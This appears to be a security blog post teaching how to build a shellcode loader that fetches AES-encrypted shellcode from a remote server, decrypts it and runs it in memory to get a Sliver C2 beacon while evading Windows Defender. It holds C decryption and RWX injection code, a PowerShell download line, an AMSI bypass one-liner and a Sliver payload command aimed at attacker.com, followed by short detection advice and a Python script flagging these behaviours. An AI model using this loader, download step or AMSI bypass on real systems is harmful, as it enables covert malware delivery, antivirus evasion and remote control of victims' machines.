
Learn how to apply AES encryption and use payload staging to download shellcode from a remote server, decrypt it, and inject it into the current process to receive a beacon from your Sliver C2, bypassing Windows Defender and Real-Time Monitoring.
🔗 Reference: Offensive C – Shellcode Encryption and Staging
You Should Know:
1. AES Encryption & Decryption in C
AES (Advanced Encryption Standard) is widely used for encrypting shellcode to evade detection. Below is a sample C code snippet for AES decryption:
#include <openssl/aes.h>
#include <string.h>

// Decrypts AES-256-CBC ciphertext into a caller-supplied output buffer of at least
// shellcode_len bytes; shellcode_len must be a multiple of 16 and iv is 16 bytes
// (AES_cbc_encrypt advances the IV in place). The AES_* calls are OpenSSL's
// low-level API, deprecated since OpenSSL 3.0 in favour of the EVP interface.
void decrypt_shellcode(unsigned char *encrypted_shellcode, unsigned char *decrypted_shellcode,
                       int shellcode_len, unsigned char *key, unsigned char *iv) {
    AES_KEY aes_key;
    AES_set_decrypt_key(key, 256, &aes_key);  /* 256-bit key */
    AES_cbc_encrypt(encrypted_shellcode, decrypted_shellcode, shellcode_len, &aes_key, iv, AES_DECRYPT);
}
2. Payload Staging with PowerShell
To download encrypted shellcode from a remote server:
$url = "http://malicious-server.com/encrypted_shellcode.bin"
$encrypted_shellcode = (Invoke-WebRequest -Uri $url -UseBasicParsing).Content
3. Shellcode Injection in Windows
Use Windows API calls to inject decrypted shellcode into memory:
#include <windows.h>
#include <string.h>

// Allocates an RWX region, copies the decrypted bytes into it and starts a thread
// at its base. The PAGE_EXECUTE_READWRITE allocation is the behaviour the detection
// notes at the end of this post refer to; it is a strong signal for EDR memory monitoring.
void inject_shellcode(unsigned char *shellcode, int length) {
    void *exec_mem = VirtualAlloc(0, length, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    memcpy(exec_mem, shellcode, length);
    CreateThread(0, 0, (LPTHREAD_START_ROUTINE)exec_mem, 0, 0, 0);
}
4. Bypassing Windows Defender
- Obfuscation: XOR encryption before AES.
- Process Hollowing: Inject into a legitimate process.
- AMSI Bypass: Disable AMSI scanning in PowerShell.
.Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
5. Sliver C2 Integration
Generate staged payload in Sliver:
sliver > generate --mtls attacker.com --save /tmp/staged.bin --format shellcode
What Undercode Say:
This technique demonstrates how encryption and staging can bypass modern EDR solutions. However, defenders can detect such behavior by:
- Monitoring unusual PowerShell web requests.
- Analyzing RWX memory allocations.
- Detecting AES decryption patterns in process memory.
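The detection checks listed above, as an added example that is not part of the original post: a small Python triage script run over constructed telemetry records (PowerShell ScriptBlock logging, Event ID 4104, plus memory-allocation events as an EDR sensor might report them; the field names and sample records are assumptions). It flags a PowerShell download cmdlet fetching a raw binary, AMSI-tampering strings, and PAGE_EXECUTE_READWRITE allocations.

```python
import re

# Constructed sample telemetry (not real logs). Field names are assumptions.
SAMPLE_EVENTS = [
    {"type": "ps_scriptblock", "event_id": 4104, "process": "powershell.exe",
     "text": "$encrypted_shellcode = (Invoke-WebRequest -Uri "
             "'http://malicious-server.com/encrypted_shellcode.bin' -UseBasicParsing).Content"},
    {"type": "ps_scriptblock", "event_id": 4104, "process": "powershell.exe",
     "text": "Get-ChildItem C:\\Users | Measure-Object"},
    {"type": "ps_scriptblock", "event_id": 4104, "process": "powershell.exe",
     "text": ".GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)"},
    {"type": "mem_alloc", "process": "powershell.exe", "protect": 0x40, "size": 4096},
    {"type": "mem_alloc", "process": "chrome.exe", "protect": 0x04, "size": 65536},
]

PAGE_EXECUTE_READWRITE = 0x40  # Win32 memory protection constant for RWX pages

# Signatures for the three behaviours the post's detection section names.
DOWNLOAD_CMDLETS = re.compile(r"Invoke-WebRequest|Invoke-RestMethod|DownloadData|DownloadString", re.I)
BINARY_URL = re.compile(r"https?://\S+\.(bin|dat|raw)\b", re.I)
AMSI_TAMPER = re.compile(r"amsiInitFailed|AmsiUtils|AmsiScanBuffer", re.I)


def classify(event):
    """Return the detection names that fire on a single telemetry record."""
    hits = []
    if event["type"] == "ps_scriptblock":
        text = event["text"]
        # A web download cmdlet pulling a raw .bin/.dat blob is the staging step.
        if DOWNLOAD_CMDLETS.search(text) and BINARY_URL.search(text):
            hits.append("ps_download_of_raw_binary")
        if AMSI_TAMPER.search(text):
            hits.append("ps_amsi_tampering")
    elif event["type"] == "mem_alloc" and event["protect"] == PAGE_EXECUTE_READWRITE:
        # RWX allocations are rare in normal software; the loader above needs one.
        hits.append("rwx_allocation")
    return hits


def scan(events):
    """Run every record through classify() and collect (process, detection) pairs."""
    return [(e["process"], name) for e in events for name in classify(e)]


if __name__ == "__main__":
    for proc, name in scan(SAMPLE_EVENTS):
        print(f"{proc}: {name}")
```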
For red teams, always:
- Use custom encryption keys per engagement.
- Test against multiple AV/EDR solutions.
- Chain multiple evasion techniques.
Prediction:
As EDR solutions improve, attackers will increasingly adopt:
- Polymorphic shellcode (changing encryption keys dynamically).
- Legitimate process spoofing (mimicking trusted apps).
- AI-based payload generation (evading static signatures).
Expected Output:
A functional encrypted shellcode loader that bypasses Defender and integrates with Sliver C2.
Reported By: Nirajkharel Offensive – Hackers Feeds